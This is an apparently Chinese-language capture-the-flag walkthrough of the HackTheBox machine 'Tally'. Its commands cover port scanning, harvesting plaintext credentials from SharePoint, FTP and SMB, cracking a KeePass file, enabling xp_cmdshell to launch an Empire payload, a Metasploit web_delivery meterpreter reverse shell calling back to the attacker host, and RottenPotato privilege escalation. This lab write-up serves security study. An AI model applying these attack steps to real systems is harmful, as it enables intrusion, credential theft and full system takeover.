Tally

Posted by on 2020年2月26日


Tally

nmap扫描端口

ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.59 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -A 10.10.10.59
PORT      STATE SERVICE            VERSION
21/tcp    open  ftp                Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
81/tcp    open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
808/tcp   open  ccproxy-http?
1433/tcp  open  ms-sql-s           Microsoft SQL Server 2016 13.00.1601.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: TALLY
|   NetBIOS_Domain_Name: TALLY
|   NetBIOS_Computer_Name: TALLY
|   DNS_Domain_Name: TALLY
|   DNS_Computer_Name: TALLY
|_  Product_Version: 10.0.14393
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2020-02-25T15:09:12
|_Not valid after:  2050-02-25T15:09:12
|_ssl-date: 2020-02-26T02:05:16+00:00; -57s from scanner time.
5985/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
15567/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|   Negotiate
|_  NTLM
| http-ntlm-info: 
|   Target_Name: TALLY
|   NetBIOS_Domain_Name: TALLY
|   NetBIOS_Computer_Name: TALLY
|   DNS_Domain_Name: TALLY
|   DNS_Computer_Name: TALLY
|_  Product_Version: 10.0.14393
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
32843/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
32844/tcp open  ssl/http           Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
| ssl-cert: Subject: commonName=SharePoint Services/organizationName=Microsoft/countryName=US
| Subject Alternative Name: DNS:localhost, DNS:tally
| Not valid before: 2017-09-17T22:51:16
|_Not valid after:  9999-01-01T00:00:00
|_ssl-date: 2020-02-26T02:05:15+00:00; -57s from scanner time.
| tls-alpn: 
|   h2
|_  http/1.1
32846/tcp open  storagecraft-image StorageCraft Image Manager
47001/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc              Microsoft Windows RPC
49665/tcp open  msrpc              Microsoft Windows RPC
49666/tcp open  msrpc              Microsoft Windows RPC
49667/tcp open  msrpc              Microsoft Windows RPC
49668/tcp open  msrpc              Microsoft Windows RPC
49669/tcp open  msrpc              Microsoft Windows RPC
49670/tcp open  msrpc              Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 or Server 2012 R2 (94%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2012 R2 (93%), Microsoft Windows Server 2012 R2 Update 1 (93%), Microsoft Windows Server 2016 build 10586 - 14393 (93%), Microsoft Windows 7 SP1 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows 7 (93%), Microsoft Windows Vista SP1 (93%), Microsoft Windows Server 2016 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -57s, deviation: 0s, median: -57s
| ms-sql-info: 
|   10.10.10.59:1433: 
|     Version: 
|       name: Microsoft SQL Server 2016 RTM
|       number: 13.00.1601.00
|       Product: Microsoft SQL Server 2016
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-02-26T02:04:02
|_  start_date: 2020-02-25T15:08:38

TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   204.81 ms 10.10.14.1
2   768.78 ms 10.10.10.59

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 184.41 seconds

访问80自动跳转重定向到SharePoint页面,nmap扫描也显示了

file

dirb爆破目录:
http://10.10.10.59/layouts/15/viewlsts.aspx

dirb http://10.10.10.59/

SitePages:
http://10.10.10.59/sitepages/FinanceTeam.aspx
用户名:ftp_user

file

Documents:http://10.10.10.59/_layouts/15/viewlsts.aspx
密码:UTDRSCH53c”$6hys

file
file

安装filezilla,查找到Tim下存在tim.kdbx

apt-get install filezilla

file

john破解,用户名,密码:tim:simplementeyo

keepass2john tim.kdbx > tim
john --format=KeePass --wordlist=/usr/share/wordlists/rockyou.txt tim
john --show tim

file

使用keepass2获取kdbx中的信息,连接密码:simplementeyo

apt-get install keepass2 -y
keepass2 tim.kdbx

file

获取smb用户名:Finance
密码:Acc0unting

执行以下命令连接目标网络,它将显示“ ACCT”作为共享名。

smbclient -L 10.10.10.59 -U Finance

file

进一步在命令下方输入,最后找到conn-info.txt时,下载它。

smbclient //10.10.10.59/ACCT -U Finance
Acc0unting
cd zz_Archived
cd SQL
get conn-info.txt

file

查看conn-info.txt,可以看到旧的MS SQL数据库用户名和密码

file

获取tester.exe

smbclient //10.10.10.59/ACCT -U Finance
Acc0unting
cd zz_Migration
cd Binaries
cd "New folder"
get tester.exe

获取用户名:sa
密码:GWE3V65#6KFH93@4GWTG2G

strings tester.exe | grep DATABASE

file

下面的命令可以把文件夹挂在到kali机器上,翻文件夹方便

mkdir /mnt/share
mount -t cifs -o username=Finance,password=Acc0unting //10.10.10.59/ACCT/ /mnt/share

file

install empire

git clone https://github.com/EmpireProject/Empire
cd Empire-master
sudo ./setup/install.sh
sudo ./setup/reset.sh

use empire

listeners
uselistener http
info
set Name Tally
set Host 10.10.14.45
execute
listeners
launcher powershell Tally

用户名:sa
密码:GWE3V65#6KFH93@4GWTG2G
dbeaver 连接,sql editor
开启xp_cmdshell
执行empire

apt-get install dbeaver
exec sp_configure 'show advanced options', 1
reconfigure
exec sp_configure 'xp_cmdshell', 1
reconfigure
xp_cmdshell 'Empire payload'

file

查看基本信息

rename FWDL187X TALLY
interact TALLY
info

file

msf开启exploit/multi/script/web_delivery

use exploit/multi/script/web_delivery
set lport 8080
set lhost 10.10.14.45
set srvhost 10.10.14.45
set srvport 5555
set target 3
set payload windows/meterpreter/reverse_tcp
run

file

Empire执行,get meterpreter shell

usemodule code_execution/invoke_metasploitpayload
set URL http://10.10.14.45:5555/cgYYvos0Yb78W
execute

file
file

get user.txt

file

没有可以直接使用的用户令牌

load incognito
list_tokens -u

file

从GitHub下载Rottenpotato进行特权升级,get system shell

git clone https://github.com/foxglovesec/RottenPotato.git
upload /root/Desktop/RottenPotato/rottenpotato.exe .
execute -Hc -f rottenpotato.exe impersonate_token "NT AUTHORITY\\SYSTEM"
getuid

file

get root.txt

file




发表评论

电子邮件地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据